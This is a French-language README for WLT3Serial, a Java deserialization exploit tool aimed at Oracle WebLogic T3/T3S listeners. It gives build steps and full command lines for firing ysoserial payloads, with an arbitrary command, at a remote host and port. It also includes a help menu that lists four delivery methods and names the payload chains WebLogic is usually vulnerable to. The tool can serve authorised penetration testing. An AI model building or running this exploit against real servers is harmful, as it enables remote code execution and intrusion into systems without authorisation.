
Exploit de désérialisation natif basé sur Java pour les écouteurs T3 (et T3S) de WebLogic.
Exploit de désérialisation natif en Java pour les écouteurs T3 (et T3S) de WebLogic (tel que décrit ICI). Nécessite les dépendances tierces ysoserial et wlthint3client.
Nécessite Oracle Java 7 ou 8. N'a pas été testé avec d'autres fournisseurs Java (tels que OpenJDK ou IBM JRE), donc je ne garantis aucun support pour ceux-ci. Peut probablement être construit avec Java 9 ou 10, mais je ne garantis aucun support pour ceux-ci.
WLT3Serial est construit via le système d'automatisation de construction Gradle. Gradle 4 doit être utilisé pour la construction, bien que d'autres versions aient été partiellement testées (voir la section Développement).
Dépendances tierces :
Procédure :
git clone https://github.com/Bort-Millipede/WLT3Serial.gitgradle clean preparegradle build -x testNécessite Oracle Java 7 ou 8. N'a pas été testé avec d'autres fournisseurs Java (tels que OpenJDK ou IBM JRE), donc je ne garantis aucun support pour ceux-ci. Peut probablement être utilisé avec Java 9 ou 10, mais je ne garantis aucun support pour ceux-ci.
Si vous utilisez les méthodes d'exploitation Property (par défaut), Bind ou WLBind, WLT3Serial doit être exécuté comme suit (notez la valeur du paramètre java '-cp') :
java -cp /path/to/ysoserial.jar:/path/to/wlthint3client.jar:/path/to/WLT3Serial-[VERSION].jar bort.millipede.wlt3.WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMDjava -cp \path\to\ysoserial.jar;\path\to\wlthint3client.jar;\path\to\WLT3Serial-[VERSION].jar bort.millipede.wlt3.WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMDSi vous utilisez la méthode d'exploitation CustomClass, WLT3Serial doit être exécuté comme suit (notez la valeur du paramètre java '-cp') :
java -cp /path/to/ysoserial.jar:/path/to/WLT3Serial-[VERSION].jar:/path/to/wlthint3client.jar bort.millipede.wlt3.WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMDjava -cp \path\to\ysoserial.jar;\path\to\WLT3Serial-[VERSION].jar;\path\to\wlthint3client.jar bort.millipede.wlt3.WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMDVoici le texte du menu d'aide intégré :
Usage: WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMD
Options:
--help print usage (you're lookin at it)
--verbose Verbose output (full thrown exception output; Disabled by default)
--method=EXPLOIT_METHOD Exploit Method for delivering generated ysoserial payload
Exploit Methods:
Property Send ysoserial payload as connection environment property value (Default; via javax.naming.Context.lookup(), variation of ysoserial.exploit.RMIRegistryExploit)
Bind Send ysoserial payload as object to bind to name (via javax.naming.Context.bind(), similar to ysoserial.exploit.RMIRegistryExploit)
WLBind Send ysoserial payload as WebLogic RMI object to bind to name (via weblogic.rmi.Naming.bind(), similar to ysoserial.exploit.RMIRegistryExploit)
CustomClass Send ysoserial payload during T3/T3S connection initialization (via custom weblogic.rjvm.ClassTableEntry class, similar to JavaUnserializeExploits weblogic.py)
--t3s[=PROTOCOL] Use T3S (transport-encrypted) connection (Disabled by default)
Protocols:
TLSv1.2
TLSv1.1
TLSv1 (Default)
SSLv3
SSLv2 (SSLv2Hello handshake only, then fallback to SSLv3 for communication: this is an Oracle Java limitation, not a WLT3Serial limitation)
Available Payload Types (WebLogic is usually vulnerable to "CommonsCollectionsX" and "JRMPClientX" types):
(available payloads listed here)